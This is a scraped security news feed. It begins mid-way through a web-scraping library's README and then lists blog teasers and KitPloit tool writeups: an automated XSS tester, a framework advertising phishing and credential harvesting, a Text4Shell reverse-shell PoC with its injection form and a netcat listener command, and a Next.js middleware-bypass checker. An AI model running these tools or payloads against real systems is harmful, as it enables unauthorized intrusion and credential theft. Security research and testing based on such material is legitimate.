<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚡ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❤️ by Karim Shoair.



☐ ☆ ✇ Security – Cisco Blog

Cisco XDR Just Changed the Game, Again

By: AJ Shipley — April 28th 2025 at 11:55
Clear verdict. Decisive action. AI speed. Cisco XDR turns noise into clarity and alerts into action—enabling confident, timely response at scale.
☐ ☆ ✇ KitPloit - PenTest Tools!

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown — April 27th 2025 at 12:30


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5

Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025: Innovation in the SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ KitPloit - PenTest Tools!

PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown — April 24th 2025 at 12:30


                              ____                                  _   _ 
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
███▄ █ ▓█████ ▒█████
██ ▀█ █ ▓█ ▀ ▒██▒ ██▒
▓██ ▀█ ██▒▒███ ▒██░ ██▒
▓██▒ ▐▌██▒▒▓█ ▄ ▒██ ██░
▒██░ ▓██░░▒████▒░ ████▓▒░
░ ▒░ ▒ ▒ ░░ ▒░ ░░ ▒░▒░▒░
░ ░░ ░ ▒░ ░ ░ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ░ ░ ▒
░ ░ ░ ░ ░

PEGASUS-NEO Penetration Testing Framework

 

🛡️ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

🔒 Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
  • Network scanning
  • Email harvesting
  • Domain enumeration
  • Social media tracking

  • Exploitation & Pentesting

  • Automated exploitation
  • Password attacks
  • SQL injection
  • Custom payload generation

  • Wireless Attacks

  • WiFi cracking
  • Evil twin attacks
  • WPS exploitation

  • Web Attacks

  • Directory scanning
  • XSS detection
  • SQL injection
  • CMS scanning

  • Social Engineering

  • Phishing templates
  • Email spoofing
  • Credential harvesting

  • Tracking & Analysis

  • IP geolocation
  • Phone number tracking
  • Email analysis
  • Social media hunting

🔧 Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

📋 Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

🚀 Usage

  1. Start the tool:
sudo python3 pegasus_neo.py
  1. Enter authentication password
  2. Select category from main menu
  3. Choose specific tool or module
  4. Follow on-screen instructions

🔐 Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

🛠️ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan

📝 Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

👥 Contributing

This is a proprietary project and contributions are not accepted at this time.

🤝 Support

For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana

⚖️ License

This project is protected under proprietary license. See the LICENSE file for details.

Made with ❤️ by Letda Kes dr. Sobri



☐ ☆ ✇ Troy Hunt

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

By: Troy Hunt — April 24th 2025 at 05:48
You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:

When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY

— Troy Hunt (@troyhunt) April 23, 2025

Which didn't result in a conclusive victor, so, I started browsing around.

Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Another, uh, "popular" site prompts you to log in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

After which you're invited to sign in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

You can log on to the Commonwealth Bank down here in Australia:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

But the login page for ANZ bank requires to log in, unless you've forgotten your login details:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷‍♂️

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And maybe you don't log in or login at all:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Microsoft:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Amazon:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Yahoo:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And, as I mentioned earlier, X:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And now, Have I Been Pwned:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.

☐ ☆ ✇ KitPloit - PenTest Tools!

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown — April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



☐ ☆ ✇ KitPloit - PenTest Tools!

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown — April 22nd 2025 at 12:30


A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest.

Next JS versions affected: - 11.1.4 and up

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

 

Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

Credits



☐ ☆ ✇ Krebs on Security

Whistleblower: DOGE Siphoned NLRB Case Data

By: BrianKrebs — April 22nd 2025 at 01:48

